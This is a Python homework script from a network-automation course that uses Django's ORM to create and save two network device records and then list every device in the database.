2bf7cbd3af3aad19347edaabc6dc3814ebd7e30c | 950 | py | Python | wk8_hw/ex3_create_2_new_devs.py | philuu12/PYTHON_4_NTWK_ENGRS | ac0126ed687a5201031a6295d0094a536547cb92 | [
"Apache-2.0"
] | 1 | 2016-03-01T14:39:17.000Z | 2016-03-01T14:39:17.000Z | wk8_hw/ex3_create_2_new_devs.py | philuu12/PYTHON_4_NTWK_ENGRS | ac0126ed687a5201031a6295d0094a536547cb92 | [
"Apache-2.0"
] | null | null | null | wk8_hw/ex3_create_2_new_devs.py | philuu12/PYTHON_4_NTWK_ENGRS | ac0126ed687a5201031a6295d0094a536547cb92 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
"""
3. Create two new test NetworkDevices in the database. Use both direct
object creation and the .get_or_create() method to create the devices.
"""
from net_system.models import NetworkDevice
import django
def main():
django.setup()
brocade_rtr1 = NetworkDevice(
device_name='Brocade-rtr1',
device_type='fc_san',
ip_address='50.76.53.28',
port=8022,
)
hp_sw1 = NetworkDevice(
device_name='HP-sw1',
device_type='stratus',
ip_address='50.76.53.29',
port=8022,
)
# Save new device information in database
brocade_rtr1.save()
hp_sw1.save()
# Print out devices just added
for a_dev in (brocade_rtr1, hp_sw1):
print a_dev
print "Display devices in the database"
devices = NetworkDevice.objects.all()
for a_device in devices:
print a_device.device_name
if __name__ == "__main__":
main()
| 22.093023 | 71 | 0.649474 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 350 | 0.368421 |